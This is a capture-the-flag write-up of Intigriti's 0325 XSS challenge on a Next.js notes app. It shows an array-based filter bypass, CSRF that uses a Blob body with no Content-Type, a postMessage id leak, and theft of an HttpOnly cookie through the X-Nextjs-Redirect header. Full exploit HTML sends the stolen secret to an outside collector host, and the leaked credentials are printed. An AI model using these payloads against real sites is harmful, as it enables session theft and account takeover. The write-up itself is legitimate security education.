Missing Content-Type and reading Text Fragments - intigriti 0325
Challenge description
We are given the source code of a next.js web application and we are tasked to find an XSS vulnerability to get the flag, that works on both Chrome and Firefox. From https://challenge-0325.intigriti.io/submit-solution we also know that the admin bot is using Firefox and will click at the center of our page.
This is how the application is structured:
.
├── bot
│ ├── Dockerfile
│ ├── bot.js
│ ├── package.json
│ └── resolv.conf
├── docker-compose-prod.yml
├── docker-compose.yml
├── nextjs-app
│ ├── Dockerfile
│ ├── app
│ │ ├── client-layout.js
│ │ ├── error.js
│ │ ├── favicon.ico
│ │ ├── globals.css
│ │ ├── layout.js
│ │ ├── lib
│ │ │ └── utils.js
│ │ ├── note
│ │ │ └── [id]
│ │ │ └── page.jsx
│ │ ├── notes
│ │ │ └── page.jsx
│ │ ├── page.jsx
│ │ ├── protected-note
│ │ │ └── page.jsx
│ │ └── submit-solution
│ │ └── page.jsx
│ ├── components
│ │ ├── CopyButton.jsx
│ │ ├── DrippingFaucet.jsx
│ │ ├── Footer.jsx
│ │ ├── Header.jsx
│ │ ├── Icons.jsx
│ │ ├── Notecard.jsx
│ │ ├── PasswordInput.jsx
│ │ ├── PasswordPopup.jsx
│ │ └── ui
│ │ ├── button.jsx
│ │ ├── card.jsx
│ │ ├── input.jsx
│ │ ├── scroll-area.jsx
│ │ ├── sonner.jsx
│ │ ├── switch.jsx
│ │ ├── textarea.jsx
│ │ ├── toast.jsx
│ │ ├── toaster.jsx
│ │ └── tooltip.jsx
│ ├── components.json
│ ├── context
│ │ └── authContext.js
│ ├── hooks
│ │ └── use-toast.js
│ ├── jsconfig.json
│ ├── lib
│ │ └── utils.js
│ ├── middleware.js
│ ├── next.config.mjs
│ ├── package.json
│ ├── pages
│ │ └── api
│ │ ├── auth.js
│ │ ├── bot.js
│ │ ├── post.js
│ │ └── track.js
│ ├── postcss.config.mjs
│ ├── public
│ │ ├── chromium.png
│ │ ├── firefox.png
│ │ ├── globe.svg
│ │ ├── next.svg
│ │ ├── vercel.svg
│ │ └── window.svg
│ └── tailwind.config.mjs
├── nginx
│ ├── Dockerfile
│ ├── Dockerfile-prod
│ ├── certs
│ ├── nginx-prod.conf
│ └── nginx.conf
├── readme.txt
└── redis.conf
20 directories, 62 files
Which is quite standard for a Next.js application, we also see a middleware.ts which made me think of CVE-2025-29927. When we open the web application we are greeted with the following login page:
There's no separate register functionality, as we can see from nextjs-app/pages/api/auth.js, the cookie is just `base64(username:password):
const redisKey = "nextjs:"+btoa(`${username}:${password}`);
const userExists = await redis.get(redisKey);
const cookieOptions = [
`HttpOnly`,
`Secure`,
`Max-Age=${60 * 60}`,
`SameSite=None`,
`Path=/`,
process.env.DOMAIN && `Domain=${process.env.DOMAIN}`,
]
.filter(Boolean)
.join("; ");SameSite=None is also interesting, means that we can send authenticated POST requests cross-origin without having to worry about top level navigations.
Finding the first vulnerability
Let's focus on the functionality of the application: it's a note taking app, so let's see if we can make the note display html.
So we can view our notes, create new ones and display a note. Interesting that we can also set a password for a note. Let's intercept the request in Burp and try to inject html:
POST /api/post HTTP/2
Host: challenge-0325.intigriti.io
Cookie: secret=YWRyYWdvczp3aHlhcmV5b3VkZWNvZGluZ3RoaXM=
Content-Length: 74
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Origin: https://challenge-0325.intigriti.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"title":"title","content":"<h1>hello</h1>","use_password":"false"}HTTP/2 400 Bad Request
Date: Tue, 01 Apr 2025 13:37:00 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 48
Content-Security-Policy: frame-ancestors https://challenge-0325.intigriti.io; base-uri 'none'; object-src 'none'; frame-src 'none';
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer
Etag: "11f6s0r5ss01c"
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000; includeSubDomains
{"message":"Invalid value for title or content"}We get Invalid value for title or content, we grep for that string in the codebase and arrive at nextjs-app/pages/api/post.js:
if (typeof content === 'string' && (content.includes('<') || content.includes('>'))) {
return res.status(400).json({ message: 'Invalid value for title or content' });
}Well it's checking for a string, what happens if we pass in an array? As arrays also implement the .includes method:
POST /api/post HTTP/2
Host: challenge-0325.intigriti.io
Cookie: secret=YWRyYWdvczp3aHlhcmV5b3VkZWNvZGluZ3RoaXM=
Content-Length: 101
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Origin: https://challenge-0325.intigriti.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"title":"title","content":["<script>alert(document.domain)</script>"],"use_password":"false"}HTTP/2 200 OK
Date: Tue, 01 Apr 2025 13:37:00 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 95
Content-Security-Policy: frame-ancestors https://challenge-0325.intigriti.io; base-uri 'none'; object-src 'none'; frame-src 'none';
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer
Etag: "qbljiayrew2n"
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000; includeSubDomains
{"message":"Note saved successfully","id":"7be4b522-047a-46a2-82ea-b3de1947acb8","password":""}If we then go to https://challenge-0325.intigriti.io/note/our_note_id we will see an alert pop up!
Cool, so just send this to the admin bot and get the flag.
The missing Content-Type
As we will soon find out, we cannot read the note from another account. So either we log in the admin as our user, or we create a note via CSRF.
For the first part we could probably take an older challenge and do some cookie tossing on our note URL, but let's go with the second option. We know that we can send cookies cross-origin because of SameSite=None, so let's look at the post API more in detail:
case 'POST':
try {
let secret_cookie;
try{
secret_cookie = atob(cookies.get('secret'));
} catch (e) {
secret_cookie = '';
}
const content_type = req.headers['content-type'];
if (!secret_cookie) {
return res.status(403).json({ message: 'Unauthorized' });
}
if (!secretRegex.test(secret_cookie)) {
return res.status(400).json({ message: 'Invalid cookie format' });
}
if (content_type && !content_type.startsWith('application/json')) {
return res.status(400).json({ message: 'Invalid content type' });
}
const redisKey = "nextjs:"+btoa(secret_cookie);
const userData = await redis.get(redisKey);
if (!userData) {
return res.status(403).json({ message: 'Unauthorized' });
}
const body = typeof req.body === 'string' ? JSON.parse(req.body) : req.body;
const { title, content, use_password } = body;
if (!title || !content) {
return res.status(400).json({ message: 'Please provide a title and content' });
}
if (typeof content === 'string' && (content.includes('<') || content.includes('>'))) {
return res.status(400).json({ message: 'Invalid value for title or content' });
}
if (title.length > 50 || content.length > 1000) {
return res.status(400).json({ message: 'Title must not exceed 50 characters and content must not exceed 500 characters' });
}
let notes = [];
try {
notes = userData ? JSON.parse(userData) : [];
if (!Array.isArray(notes)) notes = [];
} catch (error) {
notes = [];
}
const id = uuidv4();
const password = use_password === 'true' ? generatePassword() : '';
const note = { id, title, content, password };
const newNotes = [...notes, note];
await redis.set(redisKey, JSON.stringify(newNotes), 'KEEPTTL');
return res.status(200).json({ message: 'Note saved successfully', id: note.id, password: note.password });
} catch (error) {
console.error('error:', error);
return res.status(500).json({ message: 'Internal server error' });
}
default:
res.setHeader('Allow', ['POST', 'GET']);
return res.status(405).json({ message: `Method not allowed` });Quite a bit of code, but the gist of it is that it only allows the methods POST and GET, OPTIONS is not implemented so the CORS preflight will fail. Then it checks that the Content-Type is application/json, which is not a header that we can set if we're doing a no-cors cross-origin POST request.
Well, turns out we can just not send any Content-Type header at all! Which we can do if instead of a string for body we send a Blob without a content-type:
const content_type = req.headers['content-type'];
...
if (content_type && !content_type.startsWith('application/json')) {
return res.status(400).json({ message: 'Invalid content type' });
}
...
// bypass
const blobBody = new Blob([JSON.stringify(payload)], { type: "" });
await fetch(URL + "/api/post", {
method: "POST",
body: blobBody,
credentials: "include",
mode: "no-cors",
});So we can create a note as the admin using CSRF, and the note will contain our XSS payload to get the flag.
Getting the note id
With the note created, we face the following issue: we have no way of knowing what the id of the note is going to be. So we need to somehow leak it.
We remember that there are notes that can be password protected and we check the source code of protected-note:
useEffect(() => {
if(window.opener){
window.opener.postMessage({ type: "childLoaded" }, "*");
}
setisMounted(true);
const handleMessage = (event) => {
if (event.data.type === "submitPassword") {
validatepassword(event.data.password);
}
};
window.addEventListener("message", handleMessage);
return () => window.removeEventListener("message", handleMessage);
}, []);
const validatepassword = (submittedpassword) => {
const notes = JSON.parse(localStorage.getItem("notes") || "[]");
const foundNote = notes.find(note => note.password === submittedpassword);
if (foundNote) {
window.opener.postMessage({ type: "success", noteId: foundNote.id }, "*");
setIsSuccess(true);
} else {
window.opener.postMessage({ type: "error" }, "*");
setIsSuccess(false);
}
};Interesting that we see postMessage for cross frame communication, but it's missing any checks about the origin of incoming messages.
We know that we cannot set the password of the note ourselves (it's just a bool, if it's true we're going to get a hard to guess password instead), but if it's false the password is just an empty string saved in the data structure. Which for the check const foundNote = notes.find(note => note.password === submittedpassword); it means that if we send an empty password to the frame, we're going to get the note id of the first note found without a password!
The plan thus far is to use CSRF to create a note that contains the XSS payload + no password, then open a new window to /protected-note and use postMessage with the type submitPassword and an empty password to get the id of the note we just created.
Reading the text fragment
We are almost there, we have everything we need, except for the admin cookie. Which is HTTP Only, so we cannot read it using JavaScript. If we read the middleware code we can see that it is reflected as a text fragment in a redirect:
if (path.startsWith('/note/') && !request.nextUrl.searchParams.has('s')) {
let secret_cookie = '';
try {
secret_cookie = atob(request.cookies.get('secret')?.value);
} catch (e) {
secret_cookie = '';
}
const secretRegex = /^[a-zA-Z0-9]{3,32}:[a-zA-Z0-9!@#$%^&*()\-_=+{}.]{3,64}$/;
const newUrl = request.nextUrl.clone();
if (!secret_cookie || !secretRegex.test(secret_cookie)) {
return NextResponse.next();
}
newUrl.searchParams.set('s', 'true');
newUrl.hash = `:~:${secret_cookie}`;
return NextResponse.redirect(newUrl, 302);
}So it'll just end up in the text fragment, let's read it! After a bit of research we end up on this StackOverflow post: https://stackoverflow.com/a/73366996 which gives us a cool way to read text fragments, but that only works in Chrome. As the bot is using Firefox, we need a different approach.
Inspired by the latest Next.js CVE, I decided to look through their codebase for other headers that we could use (as we have XSS on same-origin, setting headers is not a problem). Then I came across the x-nextjs-data header, which when set gave the following response:
GET /note/7be4b522-047a-46a2-82ea-b3de1947acb8 HTTP/2 Host: challenge-0325.intigriti.io Cookie: secret=YWRyYWdvczp3aHlhcmV5b3VkZWNvZGluZ3RoaXM= Accept-Language: en-GB,en;q=0.9 X-Nextjs-Data: 1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Accept-Encoding: gzip, deflate, br Priority: u=0, i
HTTP/2 302 Found Date: Wed, 01 Apr 2025 13:37:00 GMT Content-Security-Policy: frame-ancestors https://challenge-0325.intigriti.io; base-uri 'none'; object-src 'none'; frame-src 'none'; X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: no-referrer X-Nextjs-Redirect: /note/7be4b522-047a-46a2-82ea-b3de1947acb8?s=true#:~:adragos:secretpassword Strict-Transport-Security: max-age=31536000; includeSubDomains
Interesting, the response is still a 302 redirect, but the Location header was replaced by X-Nextjs-Redirect instead. Which means, we can just read the contents using fetch, since the browser only knows of Location and will not redirect if it's missing.
Exploit code
And with that, we have all the pieces required to craft our exploit code. We must take into account the fact that the admin is going to click on the middle of our page, and that we need that click to spawn a new window and for the cookies to be sent in fetch + we actually need to load the note into localStorage to be able to leak its id :
<script>
async function stage1() {
await new Promise((resolve) => setTimeout(resolve, 1000));
const URL = "https://challenge-0325.intigriti.io";
const REPORT = "//adragos.requestrepo.com";
//const URL = 'http://localhost';
// Debug logging function
function debug_log(message) {
fetch(`${REPORT}/logs`, { method: "POST", body: message });
}
/* Works on Chrome, but not on Firefox
const jsPayload = `const observer = new PerformanceObserver((list) => {
list.getEntries().forEach((entry) => {
fetch('${REPORT}/', {method:'POST', body: entry.name});
});
});
observer.observe({ type: 'navigation', buffered: true });
`; */
const jsPayload = `async function pwn() {
let win = await fetch('/note/a',{headers:{'x-nextjs-data':1}});
fetch('${REPORT}/', {method:'POST', body: win.headers.get('X-Nextjs-Redirect')});
}
pwn();
`;
const payload = { title: "pwned", content: ["<script>" + jsPayload + "<" + "/script>"] };
// Explicitly set empty type for the Blob
const blobBody = new Blob([JSON.stringify(payload)], { type: "" });
window.onmessage = function (event) {
if (event.data?.type === "childLoaded") {
window.w.postMessage({ type: "submitPassword", password: "" }, "*");
} else if (event.data?.type === "success") {
const noteId = event.data.noteId;
debug_log("Success in onmessage: " + noteId);
window.open(URL + `/note/${noteId}`, "mywindow");
} else {
debug_log("Failed in onmessage");
console.error("Exploit failed");
}
};
window.open(URL + "/note/localstorage", "mywindow");
await new Promise((resolve) => setTimeout(resolve, 3000));
await fetch(URL + "/api/post", {
method: "POST",
body: blobBody,
credentials: "include",
mode: "no-cors",
});
await fetch(`${REPORT}/logs/api/post`, {
method: "POST",
body: blobBody,
credentials: "include",
mode: "no-cors",
});
await new Promise((resolve) => setTimeout(resolve, 3000));
window.open(URL + "/notes", "mywindow");
await new Promise((resolve) => setTimeout(resolve, 3000));
window.w = window.open(URL + "/protected-note", "mywindow");
}
</script>
<a href="javascript:stage1()" style="width: 100vw; height: 100vh; display: block">Get Flag</a>Which gets us the following request:
POST / HTTP/1.1
host: adragos.requestrepo.com
user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br, zstd
content-type: text/plain;charset=UTF-8
content-length: 70
origin: https://challenge-0325.intigriti.io
connection: keep-alive
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
priority: u=4
/note/a?s=true#:~:admin9937889:INTIGRITI{s3rv1ce_w0rk3rs_4re_p0w3rful}
That talks about service workers :) that's when you know you solved a challenge unintended, when the flag mentions a totally different solution. But a vuln is a vuln and we get the flag.
Cool challenge! Didn't know about the missing Content-Type trick and how to read Text fragments, so I learned something new :)
Flag: INTIGRITI{s3rv1ce_w0rk3rs_4re_p0w3rful}